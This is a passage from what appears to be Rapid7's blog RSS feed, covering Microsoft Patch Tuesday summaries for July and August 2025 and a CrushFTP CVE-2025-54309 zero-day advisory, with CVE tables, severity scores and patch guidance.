Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50157">CVE-2025-50157</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53136">CVE-2025-53136</a></td><td><p>NT OS Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>ESU Windows Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53766">CVE-2025-53766</a></td><td><p>GDI+ Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53728">CVE-2025-53728</a></td><td><p>Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49745">CVE-2025-49745</a></td><td><p>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.4</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49712">CVE-2025-49712</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53733">CVE-2025-53733</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53784">CVE-2025-53784</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53731">CVE-2025-53731</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53740">CVE-2025-53740</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53738">CVE-2025-53738</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53761">CVE-2025-53761</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53730">CVE-2025-53730</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53734">CVE-2025-53734</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53732">CVE-2025-53732</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53741">CVE-2025-53741</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53759">CVE-2025-53759</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53735">CVE-2025-53735</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53737">CVE-2025-53737</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53739">CVE-2025-53739</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53760">CVE-2025-53760</a></td><td><p>Microsoft SharePoint Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53736">CVE-2025-53736</a></td><td><p>Microsoft Word Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53788">CVE-2025-53788</a></td><td><p>Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49758">CVE-2025-49758</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53727">CVE-2025-53727</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24999">CVE-2025-24999</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49759">CVE-2025-49759</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47954">CVE-2025-47954</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Server Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53786">CVE-2025-53786</a></td><td><p>Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33051">CVE-2025-33051</a></td><td><p>Microsoft Exchange Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25005">CVE-2025-25005</a></td><td><p>Microsoft Exchange Server Tampering Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25006">CVE-2025-25006</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25007">CVE-2025-25007</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50165">CVE-2025-50165</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50171">CVE-2025-50171</a></td><td><p>Remote Desktop Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53131">CVE-2025-53131</a></td><td><p>Windows Media Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53789">CVE-2025-53789</a></td><td><p>Windows StateRepository API Server file Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53133">CVE-2025-53133</a></td><td><p>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53151">CVE-2025-53151</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50170">CVE-2025-50170</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50168">CVE-2025-50168</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50176">CVE-2025-50176</a></td><td><p>DirectX Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50169">CVE-2025-50169</a></td><td><p>Windows SMB Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48807">CVE-2025-48807</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53779">CVE-2025-53779</a></td><td><p>Windows Kerberos Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>7.2</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53721">CVE-2025-53721</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53142">CVE-2025-53142</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49751">CVE-2025-49751</a></td><td><p>Windows Hyper-V Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53716">CVE-2025-53716</a></td><td><p>Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50172">CVE-2025-50172</a></td><td><p>DirectX Graphics Kernel Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53156">CVE-2025-53156</a></td><td><p>Windows Storage Port Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53769">CVE-2025-53769</a></td><td><p>Windows Security App Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/patch-tuesday-august-2025</link>
      <guid isPermaLink="false">bltbfe1a8eb56fcd065</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 12 Aug 2025 21:44:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-54309: CrushFTP Zero-Day Exploited in the Wild]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>On Friday, July 18, 2025, managed file transfer vendor CrushFTP released information to a private mailing list on a </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>new critical vulnerability</span></a><span style='font-size: undefined;'>, tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-54309"><span style='font-size: undefined;'>CVE-2025-54309</span></a><span style='font-size: undefined;'>, affecting versions below 10.8.5 and 11.3.4_23 across all platforms. According to the public-facing </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>, this vulnerability in the CrushFTP managed file transfer software web interface is being exploited in the wild. Based on the Indicators of Compromise provided in the advisory, a “last_logins” value set for the internal ‘default’ user account is indicative of exploitation.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, CrushFTP versions </span><span style='font-size: undefined;'><strong>below 11.3.4_23 and 10.8.5 are vulnerable to CVE-2025-54309</strong></span><span style='font-size: undefined;'>. The latest available patched versions of CrushFTP, as of July 18, 2025, are:</span></p><p></p><ul><li style="direction: ltr;"><span style='font-size: undefined;'>CrushFTP 11.3.4_26</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>CrushFTP 10.8.5_12</span></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor advisory emphasizes the importance of updating to a fixed version of CrushFTP on an urgent basis. Rapid7 echoes this guidance and urges organizations to apply the vendor-supplied patch on an emergency basis, without waiting for a typical patch cycle to occur.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>While the vendor guidance, as of July 18, states “We don't believe people with a </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=DMZ"><span style='font-size: undefined;'>DMZ</span></a><span style='font-size: undefined;'> CrushFTP in front of their main are affected by this,” it’s unclear whether this is actually an effective barrier to exploitation. Out of an abundance of caution, Rapid7 advises against relying on a demilitarized zone (DMZ) as a mitigation strategy. The vendor </span><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025#section-CompromiseJuly2025-IfYouWereExploited"><span style='font-size: undefined;'>also notes</span></a><span style='font-size: undefined;'> that targeted installations should restore affected user account data from older backups.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated vulnerability check for InsightVM and Nexpose customers is in development and expected to be available in today’s (Friday, July 18) content release.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/crushftp-zero-day-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt224e82934177b530</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Ryan Emmons]]></dc:creator>
      <pubDate>Fri, 18 Jul 2025 20:25:11 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11e9686cec540b6e/6849381f7431da65da41b88f/post-hero-vulnerability.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - July 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 137 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul"><span style='font-size: undefined;'>July 2025 Patch Tuesday</span></a><span style='font-size: undefined;'>, which is above average. Microsoft is aware of public disclosure for just one of the vulnerabilities published today, and Microsoft isn’t aware of in-the-wild exploitation for any of today’s batch. This is the tenth consecutive month with no Patch Tuesday zero-day vulnerabilities evaluated as critical severity at time of publication. Today also sees the publication of 11 critical remote code execution (RCE) vulnerabilities. Three browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3><span style='font-size: undefined;'>SQL Server: zero-day info disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>It has been a quiet few months on the SQL Server front, but today Microsoft has published </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49719"><span style='font-size: undefined;'>CVE-2025-49719</span></a><span style='font-size: undefined;'>, a publicly disclosed information disclosure vulnerability, with all versions as far back as SQL Server 2016 receiving patches. Microsoft ranks this vulnerability as important, but not critical. Older versions of SQL Server with remaining Extended Security Update (ESU) program viability are not listed as receiving patches; instead, the advisory rather bluntly tells us that assets running SQL Server where the version number is not represented in the table on the advisory means that SQL Server version is no longer supported. ESU updates are released only for vulnerabilities which Microsoft deems to be critical severity, so ESU subscribers must now be hoping that today’s SQL Server zero-day vulnerability was first introduced in the SQL Server 2016 codebase.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s somewhat noteworthy that Microsoft has marked CVE-2025-49719 as publicly disclosed, since the advisory credits a Microsoft researcher with reporting the vulnerability, so Microsoft must be aware of other public information about this exploit. As is tradition for SQL Server security advisories, the lengthy FAQ on the advisory is mostly concerned with helping administrators sort through the dizzying array of SQL Server variants, feature packs, GDR vs. CU, etc., etc., and it thoughtfully avoids overburdening the reader with insights into the nature of the vulnerability itself. We do learn that “the type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory”; an attacker might well learn nothing of any value, but with luck, persistence, or some very crafty massaging of the exploit, the prize could be cryptographic key material or other crown jewels from the SQL Server.</span></p><h3><span style='font-size: undefined;'>Windows NEGOX: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Any vulnerability with a CVSSv3 base score of 9.8 is worth a look, so let’s consider </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47981"><span style='font-size: undefined;'>CVE-2025-47981</span></a><span style='font-size: undefined;'>, which is a remote code execution vulnerability in the way Windows servers and clients negotiate to discover mutually supported authentication mechanisms. The optimistically named Simple and Protected GSS-API Negotiation Mechanism (SPNEGO) is a generic capability defined in </span><a href="https://datatracker.ietf.org/doc/html/rfc4178"><span style='font-size: undefined;'>RFC-4178</span></a><span style='font-size: undefined;'>; SPNEGO is implemented in Windows alongside a significant Microsoft-specific extension of its capabilities called NEGOX; the flaw is in NEGOX, and the advisory FAQ sets out that the vulnerability affects any Windows client machine running Windows 10 1607 or above. Patches are also available for all current versions of Windows Server, although Windows Server assets might not be immediately exploitable, since the “Network security: Allow PKU2U authentication requests to this computer to use online identities” GPO is typically only enabled on Windows client assets. Domain-joined client assets might also possess a similar mitigation, since the relevant GPO is typically disabled in that context. Nevertheless, patching is surely advisable for all Windows assets, since this is a pre-authentication remote code execution, and presumably in a privileged context. Unsurprisingly, Microsoft considers exploitation more likely.</span></p><h3>KPSSVC: critical RCE</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone who has been responsible for securing a Windows KDC Proxy server for more than a month can rely on their past experience today when addressing </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49735"><span style='font-size: undefined;'>CVE-2025-49735</span></a><span style='font-size: undefined;'>, since this unauthenticated critical RCE appears to be very similar to </span><a href="https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025/#windows-kdc-proxy-critical-rce"><span style='font-size: undefined;'>last month’s</span></a><span style='font-size: undefined;'> CVE-2025-33071.</span></p><h3><span style='font-size: undefined;'>SharePoint: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint admins will be familiar with a certain class of vulnerability where an attacker with some level of existing SharePoint privilege can overstep a security boundary and remotely execute code on the SharePoint server itself. Today’s edition is </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49704"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>, which has some unusual characteristics: the FAQ claims that there is no requirement for elevated privileges, but also claims that the minimum privilege level required for exploitation is Site Owner. There’s probably a good explanation for this apparent discrepancy, but since attack complexity is low, it’s best to patch first and ask questions later.</span></p><h3><span style='font-size: undefined;'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In Microsoft product lifecycle news, today is the end of the road for SQL Server 2012, since the ESU program is now completed, meaning that there will be no future security patches even for critical vulnerabilities, and even if you’re willing to pay for the privilege; although Microsoft does occasionally release free updates for obsolete products for the most serious vulnerabilities, that’s not a reliable foundation for a security program. The Visual Studio 2022 17.8 LTSC channel also draws to a close, although newer LTSC versions of Visual Studio 2022 remain available.</span></p><h3><span style='font-size: undefined;'>Missing advisories</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>For reasons which remain unclear, on 2025-07-01 Microsoft unpublished all security advisories which it initially published during June 2025; this was surely inadvertent, and the missing advisories were eventually restored at around 14:00 UTC on 2025-07-09.</span></p><h2><span style='font-size: undefined;'>Summary charts</span></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt521a527344577161/686d8d2aca346d03bdb1c580/2025-07-vuln_count_impact.png" alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt521a527344577161/686d8d2aca346d03bdb1c580/2025-07-vuln_count_impact.png" data-sys-asset-uid="blt521a527344577161" data-sys-asset-filename="2025-07-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><hr><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt365d0323329b778d/686d8d2a740289f34ef180dc/2025-07-vuln_count_impact-component-heatmap.png" alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt365d0323329b778d/686d8d2a740289f34ef180dc/2025-07-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt365d0323329b778d" data-sys-asset-filename="2025-07-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><hr><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65b67a503ad9b4f8/686d8d2abaa7baa4757352e5/2025-07-vuln_count_component.png" alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" height="567" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" width="1117" max-width="1117" max-height="567" style="text-align: center; max-width: 1117px; width: 1117px; max-height: 567px; height: 567px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65b67a503ad9b4f8/686d8d2abaa7baa4757352e5/2025-07-vuln_count_component.png" data-sys-asset-uid="blt65b67a503ad9b4f8" data-sys-asset-filename="2025-07-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2><span style='font-size: undefined;'>Summary tables</span></h2><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49738">CVE-2025-49738</a></td><td><p>Microsoft PC Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3></h3><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47988">CVE-2025-47988</a></td><td><p>Azure Monitor Agent Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21195">CVE-2025-21195</a></td><td><p>Azure Service Fabric Runtime Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6</p></td></tr></tbody></table><h3></h3><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49713">CVE-2025-49713</a></td><td><p>Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49741">CVE-2025-49741</a></td><td><p>Microsoft Edge (Chromium-based) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-6554">CVE-2025-6554</a></td><td><p>Chromium: CVE-2025-6554 Type Confusion in 